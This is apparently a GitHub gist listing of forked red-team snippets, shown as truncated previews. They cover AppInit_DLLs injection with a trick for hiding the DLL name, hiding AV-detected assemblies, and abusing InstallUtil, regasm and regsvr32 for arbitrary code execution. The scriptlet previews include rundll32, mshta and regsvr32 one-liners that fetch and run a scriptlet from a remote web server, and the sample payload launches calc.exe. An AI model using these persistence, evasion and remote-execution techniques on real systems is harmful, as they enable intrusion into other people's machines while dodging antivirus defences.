CyDoor
CyDoor
/ appinitdllinjection.c
Created
December 28, 2017 05:17
— forked from Arno0x/appinitdllinjection.c
AppInit_DLLs injection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with: cl.exe appinitdllinjection.c /LD /o appinitdllinjection.dll | |
| // | |
| // This DLL can only be injected in a x64 process | |
| // | |
| // Set the registry to automatically load this DLL into 'any' process that is started (at least the ones relying on User32.dll) | |
| // by using the AppInit_DLLs capability: | |
| // | |
| // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = 'path_to_the_dll' (comma or space separated if required) | |
| // One trick with this registry entry is to separate DLLs with an hex '00' (by editing the value in binary) to hide the DLL name | |
| // |
CyDoor
/ service.cs
Created
December 28, 2017 05:17
— forked from Arno0x/service.cs
A basic Windows service written in .Net/c#
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Creates a basic Windows Service using .Net framework. | |
| Compile: | |
| c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs | |
| Create the service with name "Service": | |
| sc create Service type=own binpath= c:\Path\To\service.exe | |
| Start the service: |
CyDoor
/ detected.cs
Created
December 28, 2017 05:17
— forked from Arno0x/detected.cs
Hiding an AV detected assembly into another one
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs | |
| */ | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; |
CyDoor
/ installUtil.cs
Created
December 28, 2017 05:17
— forked from Arno0x/installUtil.cs
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs | |
| ===================================== USAGE ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll | |
| */ |
CyDoor
/ transformFile.py
Created
December 28, 2017 05:17
— forked from Arno0x/transformFile.py
Performs multiple useful transformation on files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| # | |
| # Author: Arno0x0x, Twitter: @Arno0x0x | |
| # | |
| import argparse | |
| from Crypto.Cipher import AES | |
| import pyscrypt | |
| from base64 import b64encode |
CyDoor
/ poshB64Encode.sh
Created
December 28, 2017 05:17
— forked from Arno0x/poshB64Encode.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "Base64 encoded, ready to be used with 'powershell -e':" | |
| echo "$1" | iconv --to-code UTF-16LE | base64 -w 0 | |
| echo |
CyDoor
/ regasm.cs
Created
December 28, 2017 05:17
— forked from Arno0x/regasm.cs
A DLL that can be called from regasm.exe/regsvc.exe to execute arbitrary code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ============== Compile ============ | |
| Create Your Strong Name Key -> key.snk | |
| $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' | |
| $Content = [System.Convert]::FromBase64String($key) | |
| Set-Content key.snk -Value $Content -Encoding Byte | |
| C:\Windows\Microsoft.NET\Framewor |
CyDoor
/ malicious.cs
Created
December 28, 2017 05:17
— forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| DO NOT COMPILE THIS SOURCE FILE ! | |
| Encode this source in base64: | |
| base64 -w0 malicious.cs > malicious.b64 | |
| Then paste it in the code in "not_detected.cs" source file |
CyDoor
/ scriptlet.sct
Created
December 28, 2017 05:17
— forked from Arno0x/scriptlet.sct
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
| <!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
| <scriptlet> | |
| <public> | |
| </public> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); |
CyDoor
/ regsvr32.sct
Created
December 28, 2017 05:17
— forked from Arno0x/regsvr32.sct
A scriptlet that can be executed by regsvr32.exe for arbitrary code execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll --> | |
| <!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll --> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{10001111-0000-0000-0000-0000FEEDACDC}" > | |
| <script language="JScript"> | |
| <![CDATA[ | |